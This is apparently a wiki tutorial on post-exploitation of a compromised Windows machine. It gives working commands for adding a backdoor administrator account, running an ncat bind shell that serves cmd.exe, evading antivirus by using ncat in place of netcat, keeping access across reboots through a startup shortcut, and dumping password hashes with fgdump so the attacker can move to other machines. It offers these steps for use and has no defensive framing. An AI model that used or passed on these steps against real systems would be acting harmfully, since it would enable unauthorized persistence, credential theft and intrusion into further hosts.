We've gotten our exploit to work on the box, now what? Whatever you do, please do not hit CTRL-C!

First things first, you want to maintain access to the system, so you should try to do a few different things:

1. Create an administrator account on the machine.
2. Create a backdoor listener.

Second, you want to pilfer as much data from this machine as possible.

1. Grab password hashes.
2. Find useful information in the machine that you can leverage to gain access to another box.

Create a user and add them to the local administrator group.

net user username password /add

net localgroup administrators username /add

Create a backdoor listener

This can be a little more challenging than it sounds. Normally, you could just upload netcat and then tell it to listen, but most AV clients will pick it up as a "hacktool" and not allow you to upload the file. However, NMAP is being distributed with a file called ncat.exe which will usually not be picked up by AV. Once you've uploaded ncat.exe to your host (there's numerous ways to do this, I can't go into all of them but try using an open file share, connecting to ftp, etc..) you're gonna want to run the following command:

ncat -l -p <port number> -e cmd.exe -k

The command breaks down like this:
-l listen mode
-p tells ncat to listen on a specific port
-e tells ncat to execute this file when someone connects on the previously specified port
-k tell ncat to keep the connection alive

There are fancier and more elaborate setups, but this will get you in, and keep letting you until the box reboots.

You may want to add a startup shortcut to run this command at startup so that you can retain access post reboot.

Getting password hashes

There are several ways to get password hashes off a machine once we've gotten root/system access. You can upload a a meterpreter executable and have it pull the hashes. You can use a password dumping program like FGDump or PWDump3. I'll go into FGDump, because that's my tool of choice in these situations.

FGDump can be found at

Once we've created an account on the box in the local administrators group we can remotely pull the hashes off a machine. We do not have to upload the file and try to run it locally.

The commands are:

fgdump.exe -h -u AnAdministrativeUser
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.